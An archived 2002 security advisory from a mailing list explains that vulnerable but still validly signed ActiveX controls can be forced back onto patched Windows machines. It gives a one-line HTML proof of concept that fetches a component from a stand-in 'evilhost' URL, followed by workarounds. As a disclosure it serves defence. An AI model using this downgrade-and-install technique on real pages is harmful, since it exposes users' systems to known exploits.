[NT] Digitally Signed Vulnerability Components Pose a Viable Threat
From: support@securiteam.comDate: 05/06/02
- Previous message: support@securiteam.com: "[UNIX] Solaris cachefsd Remote Buffer Overflow Vulnerability (Cache Name)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 6 May 2002 18:38:13 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Digitally Signed Vulnerability Components Pose a Viable Threat
------------------------------------------------------------------------
SUMMARY
As was considered for some time now, ActiveXs that have been found to
contain vulnerabilities can be still used even if Microsoft releases a
patch for them. This is because they were digitally signed making them as
valid as patched ones (there is now way to distinct old versions from new
ones).
DETAILS
Internet Explorer allows downloading of digitally signed ActiveXs directly
from the web and installing them (native code) on the user computer with
minimal interaction from the user. As history as shown many ActiveX
components contain security vulnerability causing new versions to be
released. However, the interesting part is that vulnerable versions still
contain a valid digital signature therefore a malicious use can re-install
and use them to compromise a remote host.
Proof of concept:
A hypothetical scenario is to cause the installation of an old vulnerable
digitally signed version. This can be done by creating the following HTML:
--------------------
[object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted"]
[/object]
--------------------
(NOTE: The characters [ and ] replace < and > respectively)
This would turn an immune Windows operating system into a vulnerable one
with minimal interaction from the user.
Workaround/Solution:
To prevent such a vulnerability, under Internet Explorer's security
options disable everything that contains the word "Active" in it.
Avoid choosing "Always trust them" checkbox for ActiveX and other active
content (Java, etc).
ADDITIONAL INFORMATION
The information has been provided by <mailto:guninski@GUNINSKI.COM>
Georgi Guninski.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Solaris cachefsd Remote Buffer Overflow Vulnerability (Cache Name)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
